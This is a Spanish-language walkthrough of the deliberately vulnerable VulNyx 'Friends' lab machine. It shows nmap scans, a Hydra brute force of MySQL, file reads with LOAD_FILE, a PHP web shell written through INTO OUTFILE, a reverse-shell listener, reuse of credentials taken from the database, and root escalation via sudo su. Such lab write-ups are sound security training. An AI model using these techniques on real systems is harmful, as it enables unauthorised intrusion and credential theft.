Open in app

Sign in

Write

Sign in

VulNyx | Friends (Walkthrough)

d4t4s3c
5 min readFeb 20, 2024

Friends es una máquina Linux de dificultad fácil de la plataforma VulNyx, creada por d4t4s3c y funciona correctamente en VirtualBox.

Skills:

  • OSINT
  • Brute Force (MySQL)
  • MySQL (LOAD_FILE & INTO OUTFILE)
  • Privilege Escalation (su)

Nmap

❯ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.92

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 09:30 CET
Nmap scan report for 192.168.1.92
Host is up (0.000079s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
❯ nmap -n -Pn -sVC -p22,80,3306 192.168.1.92

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 09:31 CET
Nmap scan report for 192.168.1.92
Host is up (0.00057s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey: 
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Friends
3306/tcp open  mysql   MySQL 5.5.5-10.5.19-MariaDB-0+deb11u2
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.5.19-MariaDB-0+deb11u2
|   Thread ID: 7
|   Capabilities flags: 63486
|   Some Capabilities: Speaks41ProtocolNew, LongColumnFlag, Support41Auth, Speaks41ProtocolOld, InteractiveClient, SupportsTransactions, FoundRows, IgnoreSpaceBeforeParenthesis, IgnoreSigpipes, ConnectWithDatabase, SupportsCompression, DontAllowDatabaseTableColumn, ODBCClient, SupportsLoadDataLocal, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: 9:U!AcPGP>$8/~PT6Qts
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:97:ED:88 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

22 ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80 http Apache httpd 2.4.56 ((Debian))
3306 mysql MySQL 5.5.5–10.5.19-MariaDB-0+deb11u2

Port: 80 (HTTP)

realizo fuzzing en busca de posibles rutas/archivos sin éxito…

❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u 'http://192.168.1.92/' -x 'php,txt,html'

/index.php            (Status: 200) [Size: 269]

OSINT

realizando un poco de OSINT a la imagen enumero 2 posibles usuarios

Yandex

Yandex is a technology company that builds intelligent products and services powered by machine learning. Our goal is…

yandex.com

beavis
butthead

Port: 3306 (MySQL)

en tenencia de posibles usuarios intento obtener algún password

Brute Force (Password)

❯ hydra -t 64 -l beavis -P /opt/techyou.txt mysql://192.168.1.92 -F -I

Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-20 09:48:06
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 4 tasks, 10001 login tries (l:1/p:10001), ~2501 tries per task
[DATA] attacking mysql://192.168.1.92:3306/
[3306][mysql] host: 192.168.1.92   login: beavis   password: rocknroll
[STATUS] attack finished for 192.168.1.92 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-20 09:48:18

rocknroll

accedo a MySQL con las credenciales obtenidas y dumpeo la DB

❯ mysql -h 192.168.1.92 -u beavis --password="rocknroll"

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| friends            |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0,010 sec)

MariaDB [(none)]> use friends;

MariaDB [friends]> show tables;
+-------------------+
| Tables_in_friends |
+-------------------+
| users             |
+-------------------+
1 row in set (0,001 sec)

MariaDB [friends]> select * from users;
+------+----------+-----------+
| id   | username | password  |
+------+----------+-----------+
|    1 | beavis   | b3@v1$123 |
|    2 | butthead | BuTTh3@D! |
+------+----------+-----------+
2 rows in set (0,007 sec)

beavis:b3@v1$123
butthead:BuTTh3@D!

con la función INTO OUTFILE intento incluir desde MySQL código PHP en la ruta /var/www/html pero no dispongo de permisos para hacerlo

MariaDB [friends]> SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/cmd.php";
ERROR 1 (HY000): Can't create/write to file '/var/www/html/cmd.php' (Errcode: 13 "Permission denied")

ahora utilizo la función LOAD_FILE para leer archivos locales…

consigo leer el archivo /etc/passwd

MariaDB [friends]> SELECT LOAD_FILE('/etc/passwd');
+---------------------------------------------------------------------------------------+
| LOAD_FILE('/etc/passwd')
+---------------------------------------------------------------------------------------+
| root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
beavis:x:1000:1000::/home/beavis:/bin/bash
butthead:x:1001:1001::/home/butthead:/bin/bash
 |
+---------------------------------------------------------------------------------------+
1 row in set (0,001 sec)

intente leer la id_rsa de ambos usuarios sin éxito.

en el fuzzing inicial, vi que el index era un index.php en lugar de index.html así que pensé en leer el código del mismo.

MariaDB [friends]> SELECT LOAD_FILE('/var/www/html/index.php');
+-----------------------------------------------------------------------------+
| LOAD_FILE('/var/www/html/index.php')
+-----------------------------------------------------------------------------+
|

<?php

/*
print "For more Rock & Roll visit: /M3t4LL1c@ ";
*/

?>
<html>
<head>
  <title>Friends</title>
  <style>
    body {
      background-color: #83cbc7;
    }

    img {
      border-radius: 10px;
    }
  </style>
</head>
<body>
  <center>
  <img src="image.jpg" style="width: 1880px; height: 900px;">
  </center>
</body>
<html>
 |
+-----------------------------------------------------------------------------+
1 row in set (0,001 sec)

en un comentario PHP encontré la nueva ruta /M3t4LL1c@

vuelvo a intentar con la función INTO OUTFILE si dispongo de permisos en la nueva ruta para incluir código PHP y obtengo éxito

MariaDB [friends]> SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/M3t4LL1c@/cmd.php";
Query OK, 1 row affected (0,001 sec)

consigo ejecutar comandos como usuario www-data

ya ejecutando comandos intento obtener una reverse shell

obtengo la shell como www-data

❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.10] from (UNKNOWN) [192.168.1.92] 46368
id;hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
friends

User Pivoting (www-data > butthead)

consigo convertirme en usuario butthead realizando una reutilización de credenciales (obtenidas anteriormente en la base de datos)

www-data@friends:/$ su - butthead
Password: 
butthead@friends:~$ id
uid=1001(butthead) gid=1001(butthead) grupos=1001(butthead)

Privilege Escalation

butthead puede ejecutar como root el binario su (con password)

butthead@friends:~$ sudo -l
[sudo] password for butthead: 
Matching Defaults entries for butthead on friends:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User butthead may run the following commands on friends:
    (root) PASSWD: /usr/bin/su

me convierto en usuario root abusando del privilegio

butthead@friends:~$ sudo -u root /usr/bin/su -
root@friends:~# id
uid=0(root) gid=0(root) grupos=0(root)

ya como usuario root puedo leer las flags user.txt y root.txt

root@friends:~# find / -name user.txt -o -name root.txt |xargs cat
59cefd065***********************
df81a6fd6***********************

hasta aquí la máquina Friends.

Happy Hacking!

Vulnyx
Oscp
Red Team
Offensive Security
Pentesting

--

--

d4t4s3c

Written by d4t4s3c

21 Followers

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams